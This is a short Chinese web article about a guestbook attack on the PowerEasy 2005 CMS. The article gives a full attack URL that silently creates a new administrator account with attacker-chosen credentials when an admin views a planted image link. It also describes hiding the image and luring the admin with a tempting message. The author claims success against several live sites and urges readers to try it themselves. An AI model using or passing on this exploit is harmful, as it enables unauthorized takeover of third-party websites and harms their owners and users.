首页 > 网络安全 > 脚本攻防

通杀动易2005的 XSS 攻击

admin 脚本攻防 2022-02-17 09:25:15 攻击   &middot   图片   测试   管理员   留言   时候   地址   xiaod&amp"
动易2005里面,留言的时候存在一个XSS。 攻击方法如下 : 首先在网站注册一个普通会员,然后去GUESTBOOK留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设置成0,这样在图片前面加上这个连接,基本上就看不见图片了,图片的连接却被管理员解吸执行了): http://localhost/PowerEasy/admin/admin_admin.asp?AdminName=xiaod&username=xiaod&password=123456&pwdconfirm=123456&purview=1&Action=SaveAdd 上面是本地测试地址。 只要你的留言写的足够诱惑,只要管理员一看,就OK了,他回复了你,你就是后台管理员了··· 我自己测试了几个站,结果都成功了,呵呵。大家也可以去测试一下,通杀了 SQL 与AC版···
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/jbgongfang/149156.html

留言与评论(共有 0 条评论)
   
验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持